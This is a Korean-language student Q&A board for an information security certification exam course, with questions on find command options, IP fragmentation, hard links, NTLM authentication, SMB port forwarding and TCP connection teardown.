2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
7강 40p 질문이요
강의 끝부분 46분 30초경에 find 명령어 관련해서 -size 3M 으로 입력했는데 ./big 이 나오잖아요?? 3M 면 3000000 이 아닌가요??? 왜 3145728인데 출력되는거죠?
2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
IP 단편화 질문 드려요
IP는 비연결형 프로토콜이라 전송 순서가 일정하지 않다고 하셨는데 만약 Flag 비트 3번째 값이 0으로 설정되어있는게 마지막에 안오고 먼저 와버리면 수신자는 그대로 조합을 해버리는 건가요? 거기에 대한 설명이 안되있어서 질문드려요 ㅠㅠ 예를들어 3008byte의 Payload 가 있을때 마지막 단편인 48byte 가 두번째로 와버리면 어떻게 되는지 궁금합니다.
2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
29강 루프백 관련해서 질문합니다.
127.0.0.1 로컬호스트로 핑을 해서 와이어샤크로 캡쳐가 안됬는데 보통 랜카드 상태를 확인하려고 로컬호스트 핑을 테스트 하지 않나요? 로컬호스트 핑 응답이 되면 랜카드가 작동하는 거고 타임아웃이 뜨면 랜카드도 고장난걸로 체크하는거로 알고있는데 만약 그렇다면 랜카드에다 핑을 날리는 것이니 와이어샤크에 찍어야 하는게 아닌지 궁금합니다.
2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
find 옵션 질문이요
a라는 파일을 만들고 find -name "a" -exec ls {} \; 명령을 주면 결과가 이상하게 나옵니다. a라는 이름을 가진 파일만 나와야 하는것 아닌가요? type을 d로 줘도 하위 파일까지 다 나오는거 같고 옵션을 f로 해야만 제대로 나오네요 이유가 뭔지 궁금합니다.
2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
32쪽 하드링크부분 질문드립니다.
a라는 파일에 대해 a.ln 하드링크 생성시 i-node 가 같은건 알고 있는데 그림에서 i-node 하나가 2개의 데이터블럭을 참고하는 화살표가 있어서 질문드립니다. 실제로 하드링크 파일을 생성해도 실제 데이터블럭은 그대로 아닌가요? 그림이 무슨 뜻인지 이해가 잘 안가네요. 그러니까 하드링크파일을 계속 생성해도 디스크의 용량은 변화가 없다는 걸로 아는데 제가 잘못 알고있는건가요? 어떻게 i-node 가 두개의 데이터블럭을 참조 할수가 있죠?
2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
1강 다 듣고 질문 드립니다.
1. 윈도우 인증과정 순서가 winlogon 시스템이 시작되고 lsa 서브시스템에 의해 ntlm 과 sam 파일 비교가 작동하는게 맞나요? 2. ntlm 시스템이 가동하는게 challenge & response 인증을 하는 과정인가요? 3. challenge & response 인증은 리눅스처럼 md5 해시함수에 salt 값을 사용하여 해시값을 저장하는게 맞나요? 4. challenge & response 방식이 자신의 패스워드 + challenge 값을 통해 response 값을 만들어 그 response 값을 확인하는게 서버에서 서버가 알려준 challenge 값과 sam 파일에 저장된 해시값을 이용해 response 값을 대조하는 것이라면 결국 sam 파일에 있는 해시값과 그 때마다 생성되는 challenge 값을 이용해 response 값을 만들어 재전송하면 똑같이 재전송 공격에 취약한것 아닌가요? 3. lm 해시 ntlm 해시는 취약해 vista 이후로 ntlmv2 해시를 사용한다고 했습니다. ntlmv2 해시함수는 현재 사용되는 sha-512 같은 해시함수와 동일한 복잡도 인가요?
2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
port proxy 를 이용한 smb 운용
보안상 공중망에서 SMB포트(445) 가 막혀있어 Window pc에서는 netsh 를 이용한 port proxy 를 이용해서 445번 포트를 다른포트로 이용해서 서버로 접근하려합니다. 이렇게 구성할 경우 보안성이 우수해졌다고 볼 수 있을까요? 요약 클라이언트 ----------------------------------------------------------- 10.0.0.1(루프백ip) 445port 서버의 공인ip 1024이상의포트 서버측 네트워크 ----------------------------------------------------- 서버쪽 네트워크에서 외부 1024이상의 포트 ------- 서버의 사설ip 445번 포트로 포트포워딩 이렇게 구성하게 되면 클라이언트 측에서 \\10.0.0.1 <-- 루프백 이더넷의 경로를 통해 서버로 smb연결이 가능해지는데 smb연결이 보안상 위험하기 때문에 공중망에서 닫아둔걸로 아는데 이런 구성으로 할경우 보안성이 좋아졌다고 얘기할 수 있을까요?
2017 제9,10회 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
TCP 프로토콜 연결 종료 과정(4-Way Handshake)
연결 종료 과정 ①Client -> Server : FIN+ACK ②Server -> Client : ACK ③Server -> Client : FIN+ACK ④Client -> Server : ACK | 질문 : ACK가 수신 확인 응답과 함께 상대방의 다음에 전송할 SEQ 넘버를 알려주는 것으로 알고 있습니다. Server가 ACK를 보내고 다음에 FIN+ACK를 보내는데 굳이 ACK를 한번더 보내는 이유가 있나요??
2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
강의 추가본 업로드는 언제되나요??
법률부분하고 강의 2개정도 빠져있던데 이부분 업로드는 언제 되는지 궁금합니다! 시험이 얼마 안남아서... 빨리 해주셨으면 좋겠네요 ㅠㅠ
2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]
find 의 -perm.. 질문합니다!
안녕하세요 강의 잘 듣고 있습니다. 7번강의에서 궁금한사항이 있습니다. find . -perm -4000 -o -perm -2000 할때 빠른논리연산 한다고 하는데, 앞쪽에서 트루 되지않나요? 왜 F 가 되고 ./sgid.dat 가 나오는지 이해가 안감니다.
2018 정보보안(산업)기사 실기시험대비 강의[교재별도구입+5%적립]